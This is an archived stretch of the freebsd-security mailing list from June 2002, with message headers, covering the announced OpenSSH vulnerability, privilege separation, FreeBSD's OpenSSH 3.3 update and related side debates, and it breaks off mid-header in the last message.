Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm a bit late into the discussion at this stage in the game. Can someone recommend a good reference for explaining what the intent and implementation of SSH privilege separation is all about? thanks, Klaus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 3:37: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from citi.umich.edu (citi.umich.edu [141.211.133.111]) by hub.freebsd.org (Postfix) with ESMTP id 4B15E37B407 for ; Tue, 25 Jun 2002 03:36:53 -0700 (PDT) Received: by citi.umich.edu (Postfix, from userid 104123) id 9F2E3207C1; Tue, 25 Jun 2002 06:36:48 -0400 (EDT) Date: Tue, 25 Jun 2002 06:36:48 -0400 From: Niels Provos To: Brian Nelson Cc: FreeBSD Security Subject: Re: ENOUGH!!! Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulner ability (fwd) Message-ID: <20020625103648.GG15772@citi.citi.umich.edu> References: <20020625074744.GK53232@elvis.mu.org> <3D1825E7.4030201@notgod.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D1825E7.4030201@notgod.com> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jun 25, 2002 at 01:12:23AM -0700, Brian Nelson wrote: > I think I personally don't disagree with Theo, but I am confused about > the state of Privelage Seperation for people not running > (Open|NET)BSD... So it's a hard pill to swallow when the software is "a > few days old". I am much more comfortable with a patched version coming Privilege Separation has been committed to OpenSSH in the middle of March this year. It is not just a few days old. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 3:40:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp02.web.de [217.72.192.151]) by hub.freebsd.org (Postfix) with ESMTP id 863CF37B43C for ; Tue, 25 Jun 2002 03:40:18 -0700 (PDT) Received: from [217.82.32.109] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17Mnk1-00059u-00; Tue, 25 Jun 2002 12:40:09 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 2401A1E1; Tue, 25 Jun 2002 12:40:07 +0200 (CEST) Received: from jan-linnb.lan (jan-linnb.lan [192.168.0.25]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 48FE31D1; Tue, 25 Jun 2002 12:40:02 +0200 (CEST) Subject: Re: all this talk of privilege separation ... From: Jan Lentfer To: Klaus Steden Cc: FreeBSD Security Maillinglist In-Reply-To: <20020625063412.U589@cthulu.compt.com> References: <20020625063412.U589@cthulu.compt.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 12:39:05 +0200 Message-Id: <1025001545.5810.8.camel@jan-linnb.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Die, 2002-06-25 um 12.34 schrieb Klaus Steden: > I'm a bit late into the discussion at this stage in the game. Can someone > recommend a good reference for explaining what the intent and implementation > of SSH privilege separation is all about? http://www.citi.umich.edu/u/provos/ssh/privsep.html hth, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 3:42:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from boleskine.patpro.net (boleskine.patpro.net [62.4.20.155]) by hub.freebsd.org (Postfix) with ESMTP id 0E2E737B4EE for ; Tue, 25 Jun 2002 03:42:37 -0700 (PDT) Received: from localhost (cassandre [192.168.0.1]) by boleskine.patpro.net (8.11.3/8.11.3) with ESMTP id g5PAgZY46317; Tue, 25 Jun 2002 12:42:35 +0200 (CEST) (envelope-from patpro@patpro.net) Date: Tue, 25 Jun 2002 12:42:34 +0200 Subject: Re: all this talk of privilege separation ... Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v482) Cc: freebsd-security@freebsd.org To: Klaus Steden From: patpro In-Reply-To: <20020625063412.U589@cthulu.compt.com> Message-Id: <42671D19-8828-11D6-919D-0030654D97EC@patpro.net> Content-Transfer-Encoding: 7bit X-Mailer: Apple Mail (2.482) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On mardi, juin 25, 2002, at 12:34 , Klaus Steden wrote: > I'm a bit late into the discussion at this stage in the game. Can someone > recommend a good reference for explaining what the intent and > implementation > of SSH privilege separation is all about? take a look at : http://www.citi.umich.edu/u/provos/ssh/privsep.html patpro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 3:48:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 9D1E737B406 for ; Tue, 25 Jun 2002 03:48:19 -0700 (PDT) Received: (from root@localhost) by lariat.org (8.9.3/8.9.3) id EAA23742; Tue, 25 Jun 2002 04:48:14 -0600 (MDT) Date: Tue, 25 Jun 2002 04:48:14 -0600 (MDT) From: Brett Glass Message-Id: <200206251048.EAA23742@lariat.org> To: freebsd-security@FreeBSD.ORG, klaus@compt.com Subject: Re: all this talk of privilege separation ... In-Reply-To: <20020625063412.U589@cthulu.compt.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Privilege separation is an architecture that implements the "principle of minimum privilege" with relatively fine granularity. Apache does it when the master process spawns a pool of unprivileged worker processes. OpenSSH with privilege separation does something similar: It forks tasks with no privilege to handle network traffic and tasks that require no privilege, leaving a small "master" task to handle what must be done at an elevated privilege. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 3:53:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from citi.umich.edu (citi.umich.edu [141.211.133.111]) by hub.freebsd.org (Postfix) with ESMTP id 1CF2637B403 for ; Tue, 25 Jun 2002 03:53:13 -0700 (PDT) Received: by citi.umich.edu (Postfix, from userid 104123) id 84D5F207C1; Tue, 25 Jun 2002 06:53:12 -0400 (EDT) Date: Tue, 25 Jun 2002 06:53:12 -0400 From: Niels Provos To: Brian Behlendorf Cc: security@freebsd.org Subject: Re: UseLogin and openssh-portable priv separation Message-ID: <20020625105312.GH15772@citi.citi.umich.edu> References: <20020624164234.E10398-100000@yez.hyperreal.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020624164234.E10398-100000@yez.hyperreal.org> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 04:49:23PM -0700, Brian Behlendorf wrote: > I prefer to use UseLogin in sshd_config so I can pick some login.conf > settings. It appears I needed to turn that off in order to get the > privilege separation in openssh 3.3 to work, where there's a much smaller > segment of code that runs root rather than the whole sshd child. Anyone > know whether it's possible to reconcile the two? Or a reliable way to set > the MAIL variable for all users, independent of the shells they're > using, which is all I care about at this point. If you do UseLogin, that means that you will loose privilege separation after authentication. The Pre-authentication phase is still privilege separated even with UseLogin enabled. When I developed privilege separation for OpenSSH, one intent was to make it work as well as possible even if not all necessary features are available by an operating system. So, if you do not have anonymous mmaps, you can turn off compression. if you do not have file descriptor passing, you loose privilege separation after successful authentication. Because of the way that login works, you only get pre-authentication privilege separated. The web page talks some more about that. Niels. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 5: 4:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id A06BA37B401 for ; Tue, 25 Jun 2002 05:04:41 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 084214F; Tue, 25 Jun 2002 07:04:41 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5PC4eiD045697; Tue, 25 Jun 2002 07:04:40 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5PC4etm045696; Tue, 25 Jun 2002 07:04:40 -0500 (CDT) Date: Tue, 25 Jun 2002 07:04:40 -0500 From: "Jacques A. Vidrine" To: Keith Stevenson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash Message-ID: <20020625120440.GD42982@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Keith Stevenson , freebsd-security@FreeBSD.ORG References: <20020625010643.GC43386@madman.nectar.cc> <200206250111.g5P1BVLJ015666@cvs.openbsd.org> <20020625024401.GB43738@madman.nectar.cc> <20020624225524.A96380@osaka.louisville.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020624225524.A96380@osaka.louisville.edu> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 10:55:24PM -0400, Keith Stevenson wrote: > I hate to intrude on the conversation, but what is FreeBSD's official response > to this? Posturing and full-disclosure debates aside, I'm inclined to take > Theo's warning at face value. I know better than to expect my commercial UNIX > vendor to act swiftly, but I've come to expect more from the FreeBSD project. > If FreeBSD is going to wait until after the exploits are published, please let > us know now so I can plan appropriately. We have imported OpenSSH 3.3 into -CURRENT, and will merge it to -STABLE as soon as the kinks are worked out. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 5: 8:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 464C037B404 for ; Tue, 25 Jun 2002 05:08:27 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5PC8Ew6059776; Tue, 25 Jun 2002 08:08:14 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Tue, 25 Jun 2002 08:08:13 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Matthew Jacob Cc: security@freebsd.org Subject: Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org DES is in the process of updating us to OpenSSH 3.3. I'm not sure there's anything more to say. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories On Mon, 24 Jun 2002, Matthew Jacob wrote: > > Despite DES's claim that Theo is too hard to work with, perhaps somebody who > understands the issues could see where FreeBSD stands wrt this. > > ---------- Forwarded message ---------- > Date: Mon, 24 Jun 2002 15:00:10 -0600 > From: Theo de Raadt > To: bugtraq@securityfocus.com > Cc: dsi@iss.net, announce@openbsd.org, misc@openbsd.org > Subject: Upcoming OpenSSH vulnerability > > There is an upcoming OpenSSH vulnerability that we're working on with > ISS. Details will be published early next week. > > However, I can say that when OpenSSH's sshd(8) is running with priv > seperation, the bug cannot be exploited. > > OpenSSH 3.3p was released a few days ago, with various improvements > but in particular, it significantly improves the Linux and Solaris > support for priv sep. However, it is not yet perfect. Compression is > disabled on some systems, and the many varieties of PAM are causing > major headaches. > > However, everyone should update to OpenSSH 3.3 immediately, and enable > priv seperation in their ssh daemons, by setting this in your > /etc/ssh/sshd_config file: > > UsePrivilegeSeparation yes > > Depending on what your system is, privsep may break some ssh > functionality. However, with privsep turned on, you are immune from > at least one remote hole. Understand? > > 3.3 does not contain a fix for this upcoming bug. > > If priv seperation does not work on your operating system, you need to > work with your vendor so that we get patches to make it work on your > system. Our developers are swamped enough without trying to support > the myriad of PAM and other issues which exist in various systems. > You must call on your vendors to help us. > > Basically, OpenSSH sshd(8) is something like 27000 lines of code. A > lot of that runs as root. But when UsePrivilegeSeparation is enabled, > the daemon splits into two parts. A part containing about 2500 lines > of code remains as root, and the rest of the code is shoved into a > chroot-jail without any privs. This makes the daemon less vulnerable > to attack. > > We've been trying to warn vendors about 3.3 and the need for privsep, > but they really have not heeded our call for assistance. They have > basically ignored us. Some, like Alan Cox, even went further stating > that privsep was not being worked on because "Nobody provided any info > which proves the problem, and many people dont trust you theo" and > suggested I "might be feeding everyone a trojan" (I think I'll publish > that letter -- it is just so funny). HP's representative was > downright rude, but that is OK because Compaq is retiring him. Except > for Solar Designer, I think none of them has helped the OpenSSH > portable developers make privsep work better on their systems. > Apparently Solar Designer is the only person who understands the need > for this stuff. > > So, if vendors would JUMP and get it working better, and send us > patches IMMEDIATELY, we can perhaps make a 3.3.1p release on Friday > which supports these systems better. So send patches by Thursday > night please. Then on Tuesday or Wednesday the complete bug report > with patches (and exploits soon after I am sure) will hit BUGTRAQ. > > Let me repeat: even if the bug exists in a privsep'd sshd, it is not > exploitable. Clearly we cannot yet publish what the bug is, or > provide anyone with the real patch, but we can try to get maximum > deployement of privsep, and therefore make it hurt less when the > problem is published. > > So please push your vendor to get us maximally working privsep patches > as soon as possible! > > We've given most vendors since Friday last week until Thursday to get > privsep working well for you so that when the announcement comes out > next week their customers are immunized. That is nearly a full week > (but they have already wasted a weekend and a Monday). Really I think > this is the best we can hope to do (this thing will eventually leak, > at which point the details will be published). > > Customers can judge their vendors by how they respond to this issue. > > OpenBSD and NetBSD users should also update to OpenSSH 3.3 right away. > On OpenBSD privsep works flawlessly, and I have reports that is also > true on NetBSD. All other systems appear to have minor or major > weaknesses when this code is running. > > (securityfocus postmaster; please post this through immediately, since > i have bcc'd over 30 other places..) > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 5:10:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 63A9B37B409 for ; Tue, 25 Jun 2002 05:09:56 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id EE0544F; Tue, 25 Jun 2002 07:09:55 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5PC9tiD045720; Tue, 25 Jun 2002 07:09:55 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5PC9sWm045719; Tue, 25 Jun 2002 07:09:54 -0500 (CDT) Date: Tue, 25 Jun 2002 07:09:54 -0500 From: "Jacques A. Vidrine" To: Mike Silbersack Cc: Sean Kelly , Theo de Raadt , Ted Cabeen Subject: thread past shelf life (was Re: Hogwash) Message-ID: <20020625120954.GE42982@madman.nectar.cc> References: <20020625041946.GA6840@edgemaster.zombie.org> <20020624233910.V55382-100000@patrocles.silby.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020624233910.V55382-100000@patrocles.silby.com> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 11:45:25PM -0500, Mike Silbersack wrote: > I think this thread needs to die very soon. [...] > In any case, this argument has no place on the FreeBSD security list; DES > is working on getting Priv Seperation working as we speak, and you'll be > able to upgrade in a day or two. Please end this. Mike is right --- everything useful has been said. Let's get back to hacking and admining. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 5:36:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id E368037B404 for ; Tue, 25 Jun 2002 05:36:14 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5PCa6w6060199; Tue, 25 Jun 2002 08:36:07 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Tue, 25 Jun 2002 08:36:06 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: "Matthew N. Dodd" Cc: Darren Reed , security@FreeBSD.ORG Subject: Re: Time to look put more resources into FreeSSH ? In-Reply-To: <20020625035702.F95270-100000@sasami.jurai.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 25 Jun 2002, Matthew N. Dodd wrote: > On Tue, 25 Jun 2002, Darren Reed wrote: > > I think the subject raises the question well enough. > > > > What do others think about creating a little "bio-diversity" and > > moving from OpenSSH to FreeSSH at some point in the future as the > > "default" ssh installed ? > > If it moves the ssh utility out of the system so that the upgrade path > is via ports rather than build/install world then I'm for it. > > Having OpenSSH in the source tree doesn't buy us anything over having it > in ports and managing our local patches in the projects/ CVS hierarchy. > > I see no problem with having a set of 'default packages' installed by > sysinstall. In the past, the OpenBSD OpenSSH has required hire levels of modification to run in our environment in a manner consistent with other remote access services. This has been the case because of things like PAM support. It could be that with a move to OpenSSH-portable, there's an improved ability to merge non-OpenBSD-relevant changes back to the vendor (in fact, I'd imagine that would very much be the case). This will let us re-visit the base tree issue if we choose to once that result is clear. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 5:56:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabalah.abacustrade.com (ns.abacustrade.com [62.176.110.171]) by hub.freebsd.org (Postfix) with ESMTP id BF84C37B403 for ; Tue, 25 Jun 2002 05:55:47 -0700 (PDT) Received: from there (root@iassen.abacustrade.com [192.168.0.6]) by kabalah.abacustrade.com (8.12.2/Soda machine) with SMTP id g5PDWVFA021498 for ; Tue, 25 Jun 2002 16:32:51 +0300 Message-Id: <200206251332.g5PDWVFA021498@kabalah.abacustrade.com> Content-Type: text/plain; charset="iso-8859-1" From: Iassen Anadoliev Reply-To: iassen@abacustrade.com Organization: Abacus Trade To: security@freebsd.org Date: Tue, 25 Jun 2002 14:54:53 +0300 X-Mailer: KMail [version 1.3.2] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit X-MailScanner: Found to be clean! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org subscribe iassen@abacustrade.com end To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 6:14:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from tesla.distributel.net (nat.MTL.distributel.NET [66.38.181.24]) by hub.freebsd.org (Postfix) with ESMTP id 9FF6937B403 for ; Tue, 25 Jun 2002 06:14:47 -0700 (PDT) Received: (from bmilekic@localhost) by tesla.distributel.net (8.11.6/8.11.6) id g5PDC2n36828; Tue, 25 Jun 2002 09:12:02 -0400 (EDT) (envelope-from bmilekic@unixdaemons.com) Date: Tue, 25 Jun 2002 09:12:02 -0400 From: Bosko Milekic To: Darren Reed Cc: security@FreeBSD.ORG Subject: Re: Time to look put more resources into FreeSSH ? Message-ID: <20020625091202.A36705@unixdaemons.com> References: <200206250632.QAA02400@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206250632.QAA02400@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Tue, Jun 25, 2002 at 04:32:49PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Excuse me, but would you ALL please stop changing the stupid subject lines pertaining to the discussion of the latest OpenSSH whining party so that I can properly filter you without having to re-add stupid procmail rules? Thanks. On Tue, Jun 25, 2002 at 04:32:49PM +1000, Darren Reed wrote: > > I think the subject raises the question well enough. > > What do others think about creating a little "bio-diversity" and > moving from OpenSSH to FreeSSH at some point in the future as the > "default" ssh installed ? > > Darren -- Bosko Milekic bmilekic@unixdaemons.com bmilekic@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 6:36: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from norton.palomine.net (dsl254-102-179.nyc1.dsl.speakeasy.net [216.254.102.179]) by hub.freebsd.org (Postfix) with SMTP id 5594A37B400 for ; Tue, 25 Jun 2002 06:35:52 -0700 (PDT) Received: (qmail 57464 invoked by uid 1000); 25 Jun 2002 13:35:50 -0000 Date: Tue, 25 Jun 2002 09:35:50 -0400 From: Chris Johnson To: security@freebsd.org Subject: openssh-portable and s/key passwords Message-ID: <20020625133550.GB57228@palomine.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="dDRMvlgZJXvWKvBx" Content-Disposition: inline User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --dDRMvlgZJXvWKvBx Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Having installed the openssh-portable-3.3p1_1 port, I find that I'm no longer prompted for my s/key password when I log in. ChallengeResponseAuthentication is supposed to be the default in sshd, and in any case I explicitly set it to "yes" in my sshd_config file. Is there any way to restore this functionality, or should I just wait until the dust settles on this whole mess? Chris Johnson --dDRMvlgZJXvWKvBx Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GHG1PC78Lz4X/PARAkeJAJ4nczHFDah+Y8WugNTBcdb6m+UumgCgr/cs cbnSrGn7d5umpXDZ6XF0mbU= =ETlY -----END PGP SIGNATURE----- --dDRMvlgZJXvWKvBx-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 6:40:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from home.24cl.com (174.113.sn.ct.dsl.thebiz.net [216.238.113.174]) by hub.freebsd.org (Postfix) with ESMTP id 7F19D37B405 for ; Tue, 25 Jun 2002 06:40:22 -0700 (PDT) Received: from ntmm (unknown [63.119.50.193]) by home.24cl.com (Postfix) with ESMTP id 74FFB2B27E; Tue, 25 Jun 2002 09:40:20 -0400 (EDT) Message-ID: <200206250940210524.03A3F77E@sentry.24cl.com> In-Reply-To: <200206250625.QAA01010@caligula.anu.edu.au> References: <200206250625.QAA01010@caligula.anu.edu.au> X-Mailer: Calypso Version 3.30.00.00 (1) Date: Tue, 25 Jun 2002 09:40:21 -0400 Reply-To: myraq@mgm51.com From: "MikeM" To: avalon@coombs.anu.edu.au, ahl@austclear.com.au (Tony Landells) Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 6/25/02 at 4:25 PM Darren Reed wrote: > What benefit are we *really* getting from their "code audits" ? ============= We are getting the benefit of all the security bugs and issues that they *have* found and fixed before they were found by others. Do I expect the security audits to catch everything? No. To have that expectation would be unreasonable. Do I feel that proactive security is better than reactive security? Yes. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 7:33:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from beppo.feral.com (beppo.feral.com [192.67.166.79]) by hub.freebsd.org (Postfix) with ESMTP id 8A46637B400; Tue, 25 Jun 2002 07:33:32 -0700 (PDT) Received: from mailhost.feral.com (mjacob@mailhost.feral.com [192.67.166.1]) by beppo.feral.com (8.11.3/8.11.3) with ESMTP id g5PEXVO90878; Tue, 25 Jun 2002 07:33:31 -0700 (PDT) (envelope-from mjacob@feral.com) Date: Tue, 25 Jun 2002 07:33:31 -0700 (PDT) From: Matthew Jacob X-Sender: mjacob@beppo Reply-To: mjacob@feral.com To: Robert Watson Cc: security@freebsd.org Subject: Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Not really. That's a good thing then! On Tue, 25 Jun 2002, Robert Watson wrote: > > DES is in the process of updating us to OpenSSH 3.3. I'm not sure there's > anything more to say. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 7:39:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from bogslab.ucdavis.edu (bogslab.ucdavis.edu [169.237.68.34]) by hub.freebsd.org (Postfix) with ESMTP id 49DBC37B429 for ; Tue, 25 Jun 2002 07:37:31 -0700 (PDT) Received: from thistle.bogs.org (thistle.bogs.org [198.137.203.61]) by bogslab.ucdavis.edu (8.9.3/8.9.3) with ESMTP id HAA24450 for ; Tue, 25 Jun 2002 07:37:24 -0700 (PDT) (envelope-from greg@bogslab.ucdavis.edu) Received: from thistle.bogs.org (localhost [127.0.0.1]) by thistle.bogs.org (8.11.3/8.11.3) with ESMTP id g5PEaX011154 for ; Tue, 25 Jun 2002 07:36:34 -0700 (PDT) (envelope-from greg@thistle.bogs.org) Message-Id: <200206251436.g5PEaX011154@thistle.bogs.org> To: security@FreeBSD.ORG X-To: Miroslav Pendev X-Sender: owner-freebsd-security@FreeBSD.ORG Subject: Re: The good old telnet... In-reply-to: Your message of "Tue, 25 Jun 2002 00:23:13 EDT." <20020625042313.GA75674@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> Reply-To: gkshenaut@ucdavis.edu Date: Tue, 25 Jun 2002 07:36:33 -0700 From: Greg Shenaut Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <20020625042313.GA75674@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com>, Miroslav Pendev cleopede: >I would rather get back to the good old telnet, than waiting for someone >to log in - even with non-privileged user (as Theo said even with privsep). > >Which is the worst - clear text pass going around Internet with milions of >POP3 clear text passwords or "c'mon in...? I have encrypt enable DES_CFB64 set autodecrypt in the default .telnetrc on my machines--this causes encryption to begin before the password is transmitted. It seems to me that a little work in this direction (e.g., optionally causing telnetd to insist on encryption before any text is exchanged) could make telnet once again a viable alternative; at least would get rid of the "millions of clear text passwords" problem. But of course the god-awful telnetd exploit of last summer would still have worked, because it had nothing to do with passwords. Greg Shenaut To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 8:10:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mxout3.netvision.net.il (mxout3.netvision.net.il [194.90.9.24]) by hub.freebsd.org (Postfix) with ESMTP id CA99237B42A for ; Tue, 25 Jun 2002 08:09:16 -0700 (PDT) Received: from mailgw.netvision.net.il ([62.0.162.170]) by mxout3.netvision.net.il (iPlanet Messaging Server 5.2 HotFix 0.6 (built Jun 11 2002)) with SMTP id 